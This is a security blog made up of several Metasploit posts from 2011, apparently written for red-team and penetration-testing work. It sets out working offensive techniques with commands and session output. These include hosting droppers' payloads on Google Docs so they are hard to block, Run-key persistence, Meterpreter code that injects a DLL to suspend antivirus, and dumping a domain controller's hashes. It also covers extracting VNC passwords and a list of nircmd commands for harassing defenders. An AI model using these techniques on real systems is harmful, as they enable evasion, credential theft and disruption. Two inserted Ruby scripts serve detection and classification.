Room362.com

Blatherings of a security addict.

Metasploit Payloads Explained - Part 1a


In Part 1 I gave an example I used at CCDC with the single ‘windows/download_exec’. One of the downsides of that payload is that you need to host the binary, giving up an IP/host that can be blocked. Well, Google recently (a couple of months ago) allowed people to upload ‘anything’ to Google Docs, and you can then share these files publicly. You can probably already see where I’m going with this, but here are the steps to get it going. First, upload your malicious binary (not the dropper ‘windows/download_exec’, but the file it needs to execute). I assume you don’t need a picture to find the upload button ;–)

Next, go to Action –> Share –> Share and make it public:

You’ll get a link of the form docs.google.com/leaf?id=something:

Go to that link and copy the link that says ‘Download’

You should have something like this:

https://docs.google.com/uc?id=XXXXXXXX&export=download&hl=en_US

Remove everything after the & and change https to http (download_exec can’t talk SSL) so you have something that looks like:

http://docs.google.com/uc?id=XXXXXXXX

Now use that link in the URL option when you generate your ‘windows/download_exec’ binary and you should be good to go. You can still change your binary on the fly by right clicking the file in your Google Docs list and selecting “Add or manage revisions”. Plus you get the added bonus of being virtually unblockable.

One thing to be careful of is that the download and ‘leaf’ links are still live if you put the files in the ‘trash’ on Google Docs; you need to empty the trash for them to be completely offline.

Incident Responders, if you find something making these requests, switch the ‘uc’ portion of the download URL back to ‘leaf’ and you can find out when it was uploaded, and you have the ability to “Report Abusive Content”; if that account continues to do ‘bad stuff’ it will get looked into by Google.
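As an added, defender-side example (not code from the original post), here is a small Ruby triage script that scans constructed proxy log lines for the docs.google.com/uc?id= request shape described above and turns each hit into the ‘leaf?id=’ link used to check the upload date and report the file; the log format, client addresses, document ids and the high/low priority heuristic are all assumptions.

```ruby
require 'uri'

# Constructed sample proxy log lines: "timestamp client_ip method url user_agent".
SAMPLE_LOG = <<~LOG
  2011-06-23T14:02:11Z 10.1.5.22 GET http://docs.google.com/uc?id=0B_CONSTRUCTED_ID_1 -
  2011-06-23T14:02:13Z 10.1.5.22 GET http://www.example.org/index.html Mozilla/5.0
  2011-06-23T14:05:40Z 10.1.5.40 GET https://docs.google.com/uc?id=0B_CONSTRUCTED_ID_2&export=download&hl=en_US Mozilla/5.0
  2011-06-23T14:07:02Z 10.1.5.22 GET http://docs.google.com/uc?id=0B_CONSTRUCTED_ID_1 -
LOG

# Parse one log line into a hash, or nil when the line is not in the expected shape.
def parse_log_line(line)
  ts, client, method, url, agent = line.split(' ', 5)
  return nil if url.nil?
  { ts: ts, client: client, method: method, url: url, agent: agent.to_s.strip }
end

# Return the document id when the URL is a docs.google.com/uc request, else nil.
def google_docs_uc_id(url)
  uri = URI.parse(url)
  return nil unless uri.host == 'docs.google.com' && uri.path == '/uc' && uri.query
  URI.decode_www_form(uri.query).to_h['id']
rescue URI::InvalidURIError, ArgumentError
  nil
end

# Investigation link: swap the 'uc' endpoint for 'leaf', as the post suggests,
# to see when the file was uploaded and to reach "Report Abusive Content".
def leaf_link_for(doc_id)
  "https://docs.google.com/leaf?id=#{doc_id}"
end

# Heuristic (an assumption, not a rule from the post): plain http plus a bare id
# with no export=download is the shape a download_exec dropper would request, so
# it is reported as :high; an https browser download with export=download is :low.
def triage_google_docs_downloads(log_text)
  findings = []
  log_text.each_line do |line|
    rec = parse_log_line(line)
    next unless rec
    doc_id = google_docs_uc_id(rec[:url])
    next unless doc_id
    plain_http = rec[:url].start_with?('http://')
    bare_id = !rec[:url].include?('export=download')
    findings << { ts: rec[:ts], client: rec[:client], doc_id: doc_id,
                  priority: (plain_http && bare_id) ? :high : :low,
                  empty_user_agent: rec[:agent].empty? || rec[:agent] == '-',
                  investigate: leaf_link_for(doc_id) }
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  triage_google_docs_downloads(SAMPLE_LOG).each do |f|
    puts "#{f[:priority].to_s.upcase} #{f[:ts]} #{f[:client]} id=#{f[:doc_id]} -> #{f[:investigate]}"
  end
end
```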

Metasploit Payloads Explained - Part 1


Payload selection is something that rarely gets talked about in detail. Most PoCs just use calc.exe, netcat, or some kind of socket. The vast majority of Metasploit tutorials, videos and documentation use the windows/meterpreter/reverse_tcp payload, which is only one of 224 possible payloads. Here is a little disclaimer: while the payloads in Metasploit don’t get updated as much as other parts of Metasploit, this is point-in-time documentation of them (June 23, 2011), and the payloads available in Metasploit are constantly changing. I challenge you to keep doing a ‘show payloads’ and see what’s new.

If you issue ‘show payloads’ at the base of Metasploit’s console (msf>), it will show you every payload that Metasploit has available. However, exploit module writers can help the user out a bit with their selection by putting special limiters inside of their module. These limiters can be as specific as pointing out a specific payload, or as broad as specifying that it will only work with a ‘windows’ payload. For a decent example of this in action check out the JBoss ‘bshdeployer’ exploit module (modules/exploits/multi/http/jboss_bshdeployer.rb).

The payloads Metasploit has are broken down into ‘staged’, ‘stagers’, and ‘singles’ (also known as Inline). The difference between ‘staged’ and ‘stagers’ is pretty simple: ‘staged’ payloads use tiny ‘stagers’ to be able to fit into small exploitation spaces. During exploitation the exploit developer often has a very limited amount of memory they can manipulate through the inputs of the program they are exploiting. The stagers go in this space and their only job is to pull down the rest of the ‘staged’ payload. The downside to these types of payloads is that they require a connection to something that will shovel them the rest of the payload. Inline payloads or ‘singles’ don’t have this problem. They are self-contained and do what they are designed to do without any assistance.

All of the payloads in Metasploit use the one, the only, Multi Handler. I call it that because of how I call it:

msf> use multi/handler

It is a fitting title though as it is equipped to handle every single payload inside of Metasploit no matter what the architecture or type of connection being made. It knows how to deal with each type of payload because you tell it what to expect, but that doesn’t take away from the fact that in this single utility lies the crucial stepping stone for all of Metasploit’s exploitation.

The structure of most payload names tells you exactly what they do, but not always. If the description says ‘Inline’ that means it is a single; if it says ‘Stager’ that means it’s staged. Let’s break down a few of the lesser-known ones:

  • cmd/windows/adduser – This is a single that executes ‘net user /add’ with the username and password you specify. This one doesn’t say that it’s ‘Inline’, but all of the ‘cmd/’ or ‘/exec’ payloads are singles.
  • osx/armle/vibrate – A single that, when executed on an iPhone, makes it vibrate.
  • generic/debug_trap – Trips a debugger if one is attached to the process (sends a single 0xCC ‘break’ byte)

One thing that isn’t immediately obvious is another marker of staged vs. singles:

osx/ppc/shell/reverse_tcp
osx/ppc/shell_reverse_tcp

The difference between these two payloads isn’t obvious other than the fact that one has an underscore ‘_’ instead of a forward slash ‘/’. The one with the underscore is a single while the other is staged. But the architecture of the naming convention is a bit complicated. Most stick to OS/ARCHITECTURE/TYPE/PAYLOAD, where a slash instead of an underscore between TYPE and PAYLOAD signifies the difference we just talked about. But not all payloads stick to this format. You can even go crazy and actually look in the directory: msfdirectory/modules/payloads/ – everything in the singles directory... hmmm, yup, is a single.
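As an added example (not from the post or from Metasploit itself), here is a Ruby classifier that applies the naming rules above, generalized to the two-, three- and four-component names seen on this page; the list of stage TYPE names is an assumption drawn from the payload names mentioned here, and, as the post notes, the payloads directory is the final word when a name breaks the convention.

```ruby
# Stage TYPE names assumed for this example (drawn from names used on the page);
# real Metasploit has more, and the modules/payloads/ directory is authoritative.
STAGE_TYPES = %w[shell meterpreter vncinject dllinject upexec
                 patchupmeterpreter patchupdllinject].freeze

# Split a payload name on '/' and decide single vs staged from the convention:
#   OS[/ARCH]/TYPE/PAYLOAD  -> staged  (slash between TYPE and PAYLOAD)
#   OS[/ARCH]/TYPE_PAYLOAD  -> single  (underscore collapses TYPE and PAYLOAD)
#   cmd/... or no TYPE      -> single  (adduser, download_exec, debug_trap)
# Returns a hash; :kind is :single or :staged and :reason says which rule fired.
def classify_payload(name)
  parts = name.split('/')
  last  = parts.last
  # Rule 1: everything under cmd/ is a command-line single.
  if parts.first == 'cmd'
    return { name: name, kind: :single, payload: last, reason: 'cmd/ payloads are singles' }
  end
  # Rule 2: a stage TYPE component followed by a slash marks a staged payload.
  if parts.length >= 2 && STAGE_TYPES.include?(parts[-2])
    return { name: name, kind: :staged, type: parts[-2], payload: last,
             reason: "'#{parts[-2]}/' before '#{last}' marks a staged payload" }
  end
  # Rule 3: TYPE_PAYLOAD fused into one component marks an inline single.
  STAGE_TYPES.each do |type|
    next unless last.start_with?("#{type}_")
    return { name: name, kind: :single, type: type, payload: last.sub("#{type}_", ''),
             reason: "'#{type}_' prefix marks an inline single" }
  end
  # Rule 4: no stage TYPE anywhere, so the payload is self-contained.
  { name: name, kind: :single, payload: last, reason: 'no stage type in name; single' }
end

# Group a list of names by kind, the way you might sort 'show payloads' output.
def summarize_payloads(names)
  names.map { |n| classify_payload(n) }
       .group_by { |c| c[:kind] }
       .transform_values { |cs| cs.map { |c| c[:name] } }
end

if __FILE__ == $PROGRAM_NAME
  %w[osx/ppc/shell/reverse_tcp osx/ppc/shell_reverse_tcp cmd/windows/adduser
     generic/debug_trap windows/download_exec windows/meterpreter/reverse_tcp].each do |n|
    c = classify_payload(n)
    puts format('%-34s %-7s %s', n, c[:kind], c[:reason])
  end
end
```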

Singles are great for fire and forget; I’ve used them as payloads for USB sticks (so the machine didn’t have to have a connection to do what I needed) all the way to a pretty sneaky persistence method. One that I used quite often at CCDC was the payload ‘windows/download_exec’. The only option this single has is ‘URL’. We would put something like http://www.redteam.com/evil.exe and generate the binary:

(Yes you can use msfpayload, or msfvenom on the command line to generate payloads, but I like to stay inside of msfconsole)

Then set that to auto start when someone logs in with something like:

meterpreter > reg setval -k "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -v "WindowsUpdate" -d "C:\Windows\dropper.exe"

Now all we had to do was wait for logins. If they happened to find our evil.exe binary (which download_exec saves as ‘a.exe’ in System32) and blocked our IP, all we had to do was replace evil.exe on our web server and wait for the dropper to download the new one. A crude form of persistence, but it worked well.

I’m going to end this with a list of all the payloads… hopefully for all you tab-completion lazy bums this might be the first time you’ve actually taken a second to look around. In the next post I’ll be going into Meterpreter, the BEST payload in my humble-totally-unbiased opinion ;), with a bit of pivoting thrown in for good measure.

Remotely Suspend All Threads With Meterpreter


Just a follow up to my previous post. One of the things that sets that method apart is the fact that the suspension (once the DLL injection occurs) comes from within the process, and it suspends all the child processes as well.

Another way you can do this without the injection is just sending a suspend to all the threads in the process.

pid = 2980
targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)
targetprocess.thread.each_thread do |x|
  targetprocess.thread.open(x).suspend
end

We open the process just like we did before and make a very simple ‘each_thread’ loop. There are a few AV engines that detect this as tampering. But if your target isn’t AV… say it’s Process Explorer during CCDC, this might just confuse them enough to buy you some time to do other things without their watchful eye on you.

The other cool thing that happened when I did this was Process Explorer didn’t detect the process as suspended. If you looked under the thread list they were all suspended but not the process itself according to Process Explorer.

Not rocket science at all, but that’s because it’s built into the framework. Just another thing that Metasploit makes dead simple.

Remote DLL Injection With Meterpreter


Recently Didier Stevens wrote ‘Suspender.dll’, a DLL that will suspend a process and all of its child processes after a delay. 60 seconds is its default, but you can rename the DLL to add a number (such as ‘Suspender10.dll’ for 10 seconds) to make the delay whatever you wish. You can find the blog post and download here: http://blog.didierstevens.com/2011/04/27/suspender-dll/

Jonathan Cran and I had the same idea, as I’m sure many others did as well. This might work against AntiVirus setups that protect themselves from being killed or their services stopped.

I still stand by my original claim that just removing it is easier (Blog Post: Silently Uninstall SEP). However that might be something the user notices (A little shield disappearing).

Well, I didn’t know how to do this with Meterpreter, so a bit of Google fu landed me on: http://www.codeproject.com/KB/threads/winspy.aspx which has three different ways to do it, the second of which uses a DLL (score!)

Using IRB within a Meterpreter shell I started using Railgun (because once you know something, sometimes it’s easy not to look for other solutions).

I start off setting up some variables after I’ve uploaded Suspender.dll:

pid = 1436
sizeofsuspend = 52376
pathtosuspend = "C:\Docume~1\Administrator\Desktop\Suspender10.dll"

Next up we need to open a handle on the target process:

handle = client.railgun.kernel32.OpenProcess(PROCESS_ALL_ACCESS,false,pid)["return"]

With the handle we allocate some memory in the remote process for our DLL to live in:

allocatedmem = client.railgun.kernel32.VirtualAllocEx(handle,nil,sizeofsuspend,MEM_COMMIT,PAGE_READWRITE)["return"]

Writing that DLL to memory isn’t much harder: (this and the previous step is the wrong way to do things as we’ll see later)

client.railgun.kernel32.WriteProcessMemory(handle,allocatedmem,pathtosuspend,sizeofsuspend,nil)

Here is the hard part. We have to somehow figure out the address of LoadLibraryA in the remote process’s memory space, accounting for ASLR, then pass it the location in memory where our DLL is hiding. Yah, I couldn’t figure this one out; here is the best I did:

client.railgun.kernel32.CreateRemoteThread(handle,nil,0,allocatedmem,pathtosuspend,0,nil)

Then I got a friendly reminder from HD that most of this was built into Meterpreter already, so all that Railgun nastiness boils down to something a lot simpler. Set the variables again:

pid = 1436
pathtosuspend = "C:\Docume~1\Administrator\Desktop\Suspender10.dll"

But this time we are going to use the loadlibrary payload that just got added to Metasploit Framework in r12765. We generate the payload with it pointing at our Suspender DLL:

pay = client.framework.payloads.create("windows/loadlibrary")
pay.datastore['DLL'] = pathtosuspend
pay.datastore['EXITFUNC'] = 'thread'
raw = pay.generate

Open the process, this time with Rex:

targetprocess = client.sys.process.open(pid, PROCESS_ALL_ACCESS)

Allocate the memory in the remote process and write the payload (not our DLL) into that space:

mem = targetprocess.memory.allocate(raw.length + (raw.length % 1024))
targetprocess.memory.write(mem, raw)

And finally create the remote thread.. MUCH easier (the power of Rex even over Railgun):

targetprocess.thread.create(mem, 0)

And 10 seconds later our AV and all its child processes stop. Suspended by Didier’s Suspender.DLL. Thanks to HD for the slap in the head that I was doing things the wrong way and the 1 AM update to the framework that made this possible.

Dumping Hashes on Win2k8 R2 X64 With Metasploit


When trying to dump password hashes on a Windows 2008 R2 64-bit box I constantly run into the “The parameter is incorrect” error in Meterpreter. So I’ve had to fall back on dropping binaries, which I really don’t like doing because of the added clean-up and chance of getting ‘caught’. Well, with a bit of migration you’ll be back to passing the hash. Here is how, with a bit of the thought process first:

            ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                  ##


   =[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 364 auxiliary - 43 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
   =[ svn r12622 updated today (2011.05.15)

msf > 
[*] DC_IP:49220 Request received for /AYSBk...
[*] DC_IP:49220 Staging connection for target YSBk received...
[*] Patching Target ID YSBk into DLL
[*] DC_IP:49221 Request received for /BYSBk...
[*] DC_IP:49221 Stage connection for target YSBk received...
[*] Meterpreter session 7 opened (ATTACKER_IP:443 -> DC_IP:49221) at Sun May 15 21:37:31 +0000 2011

msf > sessions -i 7
[*] Starting interaction with 7...

meterpreter > sysinfo
System Language : en_US
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Computer        : DOMAINCONTROLLE
Architecture    : x64 (Current Process is WOW64)
Meterpreter     : x86/win32

meterpreter > ps

Process list
============

 PID   Name                                       Arch  Session  User                          Path
 ---   ----                                       ----  -------  ----                          ----
 0     [System Process]                                                                        
 4     System                                     x64   0                                      
 224   smss.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\smss.exe
 324   csrss.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 364   csrss.exe                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\csrss.exe
 372   wininit.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wininit.exe
 404   winlogon.exe                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 468   services.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\services.exe
 476   lsass.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 484   lsm.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsm.exe
 628   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 708   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 804   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 836   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 880   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 932   svchost.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 972   svchost.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 328   svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1172  spoolsv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1204  Microsoft.ActiveDirectory.WebServices.exe  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 1252  dfsrs.exe                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 1288  dns.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 1316  ismserv.exe                                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 1360  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1392  vmtoolsd.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1464  wlms.exe                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wlms\wlms.exe
 1492  dfssvc.exe                                 x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 1572  VMUpgradeHelper.exe                        x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMUpgradeHelper.exe
 1896  TPAutoConnSvc.exe                          x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe
 2016  vds.exe                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 872   sppsvc.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\sppsvc.exe
 1268  WmiPrvSE.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\wbem\WmiPrvSE.exe
 2360  taskhost.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\System32\taskhost.exe
 2424  dwm.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\dwm.exe
 2452  explorer.exe                               x64   1        SITTINGDUCK\juser             C:\Windows\explorer.exe
 2504  TPAutoConnect.exe                          x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\TPAutoConnect.exe
 2512  conhost.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\conhost.exe
 2632  VMwareTray.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareTray.exe
 2640  VMwareUser.exe                             x64   1        SITTINGDUCK\juser             C:\Program Files\VMware\VMware Tools\VMwareUser.exe
 2716  mmc.exe                                    x64   1        SITTINGDUCK\juser             C:\Windows\System32\mmc.exe
 3052  mscorsvw.exe                               x86   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
 2216  TrustedInstaller.exe                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\servicing\TrustedInstaller.exe
 1932  mscorsvw.exe                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe
 2564  svchost.exe                                x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1732  msdtc.exe                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 2992  notepad.exe                                x86   1        SITTINGDUCK\juser             C:\Windows\SysWOW64\notepad.exe
 1720  notepad.exe                                x64   1        SITTINGDUCK\juser             C:\Windows\System32\notepad.exe


meterpreter > getpid
Current pid: 2992

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Ah, the wonderful ‘The parameter is incorrect’ error. OK, we are an admin since we can see the user for SYSTEM processes, so that isn’t the issue, but let’s do a ‘getprivs’ just in case:

meterpreter > getprivs    
============================================================
Enabled Process Privileges
============================================================
  SeDebugPrivilege
  SeIncreaseQuotaPrivilege
  SeMachineAccountPrivilege
  SeSecurityPrivilege
  SeTakeOwnershipPrivilege
  SeLoadDriverPrivilege
  SeSystemProfilePrivilege
  SeSystemtimePrivilege
  SeProfileSingleProcessPrivilege
  SeIncreaseBasePriorityPrivilege
  SeCreatePagefilePrivilege
  SeBackupPrivilege
  SeRestorePrivilege
  SeShutdownPrivilege
  SeSystemEnvironmentPrivilege
  SeChangeNotifyPrivilege
  SeRemoteShutdownPrivilege
  SeUndockPrivilege
  SeEnableDelegationPrivilege
  SeManageVolumePrivilege

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Boo.. Ok, so maybe we have to be ‘SYSTEM’…

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Still nothing… Maybe it requires that we be in a 64-bit process… PID 1720 was the 64-bit version of Notepad, let’s try that…

meterpreter > migrate 1720
[*] Migrating to 1720...
[*] Migration completed successfully.

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

Damn, what about as ‘SYSTEM’…

meterpreter > getsystem
...got system (via technique 1).

meterpreter > hashdump
[-] priv_passwd_get_sam_hashes: Operation failed: The parameter is incorrect.

No joy.. hmmm What about a ‘SYSTEM’ process that was already there.. ‘dns.exe’ PID 1288 should be good…

meterpreter > migrate 1288
[*] Migrating to 1288...
[*] Migration completed successfully.

meterpreter > hashdump
Administrator:500:MYLMHASH:MYNTLMHASH:::
Guest:501:MYLMHASH:MYNTLMHASH:::
krbtgtG:502:MYLMHASH:MYNTLMHASH:::
Domain Admin?:1000:MYLMHASH:MYNTLMHASH:::
juserN:1104:MYLMHASH:MYNTLMHASH:::
jane.user??:1105:MYLMHASH:MYNTLMHASH:::
DOMAINCONTROLLE$?:1001:MYLMHASH:MYNTLMHASH:::

meterpreter > 

w00t. So I don’t know why, but it seems that you have to be in a ‘SYSTEM’ process whose primary token (started by SYSTEM) is SYSTEM (since ‘getsystem’ wasn’t working). I also tried this getting SYSTEM to run a 32-bit process, and was still unable to dump hashes. So next time you’re on a Win2k8 R2 64-bit box, remember to migrate into a pre-existing 64-bit SYSTEM process and you should be good to go.

Update on 2011-05-15 23:39 by Rob Fuller

As Gavin points out in the comments, it is better to run the meterpreter script or post module to do hashdumping on systems. The only time this is not the case is when you are trying to get domain hashes on a domain controller. The registry does not store these hashes (as far as I know). So LSASS injection is the only route and you have to jump through the mentioned hoops.

Metasploit VNC Password Extraction


Chris Gates wrote a blog post about the ‘getvncpw’ Meterpreter script. I ran into the same issue on penetration tests in the past but didn’t know much about the whacked-out version of DES that RFB (the VNC protocol) was using. Not being a fan of manually editing a binary and compiling each time I had a password to crack, I wanted to find another way, but didn’t get a chance to.

Yesterday I saw this ticket: https://www.metasploit.com/redmine/issues/3183 and thought to myself: “That’s definitely within my coding ability to contribute a patch for”. After almost 15 hours of coding between 9 pm on Saturday and 8 pm on Sunday, it went far beyond just adding in a bit of code to support UltraVNC.

changelog:

  • Complete rewrite as a post module instead of a meterpreter script
  • Passwords of less than 8 characters are correctly padded (thanks jduck)
  • UltraVNC checks added
  • TightVNC checks added for both VNC and its control console
  • Made it very simple to add new checks in either the registry or in a file
  • Output is a bit more verbose (lets you know something is happening)
  • Reports authentication credentials found to database
  • Identifies the port that VNC is running on as well

It isn’t in the Metasploit trunk, so until/if it gets added you can get it here:

enum_vnc_pw.rb

If you have a check, find it breaks for some reason or another, or just want to tell me that I suck, please leave a comment or email me.

Here it is in action against my VM with 3 different VNC servers on it (calling the post module in two separate ways) :

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: XPBASELINE\Administrator
meterpreter > background
msf exploit(handler) > use post/windows/gather/enum_vnc_pw 
msf post(enum_vnc_pw) > set SESSION 1
SESSION => 1
msf post(enum_vnc_pw) > show options

Module options (post/windows/gather/enum_vnc_pw):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.

msf post(enum_vnc_pw) > run

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
[*] Post module execution completed

msf post(enum_vnc_pw) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > run post/windows/gather/enum_vnc_pw 

[*] Enumerating VNC passwords on XPBASELINE
[*] Checking UltraVNC...
[+] UltraVNC => A85B4C5976979DE93B => thisismy on port: 5900
[+] VIEW ONLY: UltraVNC => DE2C1BA7393F6708B3 => 111 on port: 5900
[*] Checking WinVNC3_HKLM...
[*] Checking WinVNC3_HKCU...
[*] Checking WinVNC3_HKLM_Default...
[*] Checking WinVNC3_HKCU_Default...
[*] Checking WinVNC_HKLM_Default...
[*] Checking WinVNC_HKCU_Default...
[*] Checking WinVNC4_HKLM...
[+] WinVNC4_HKLM => c777b2de337a91cf => mypasswo on port: 5900
[*] Checking WinVNC4_HKCU...
[*] Checking RealVNC_HKLM...
[*] Checking RealVNC_HKCU...
[*] Checking TightVNC_HKLM...
[+] TightVNC_HKLM => 7ebf1e76f732459f => authpass on port: 5900
[*] Checking TightVNC_HKLM_Control_pass...
[+] TightVNC_HKLM_Control_pass => f0299fd0e927cf2f => adminpas on port: 5900
meterpreter > 

Psychological Warfare With NirCMD


One of the best ways to throw blue teamers off the scent of another host getting owned, which also has the added effect of stressing them out, is a batch script that runs through some of the more annoying features in nircmd.exe in succession and at regular intervals:

http://www.nirsoft.net/utils/nircmd.html

  • setdisplay 640x480
  • killprocess taskmgr.exe
  • killprocess procexp.exe
  • win -style title “my computer” 0x00c00000
  • win child title “my computer” +exstyle all 0x00400000
  • win +exstyle title “my computer” 0x00400000
  • win trans ititle “internet explorer” 256
  • win close class “CabinetWClass”
  • multiremote copy “c:\temp\computers.txt” exitwin poweroff force
  • exitwin logoff
  • standby
  • monitor off
  • win child class “Shell_TrayWnd” hide class “button”
  • win hide class progman

Just to name a few…

Another fun batch script to have running is ‘echo knock knock | clip’ in an endless and delayless loop. (It makes ‘knock knock’ the only thing that will ever be pasted ;–)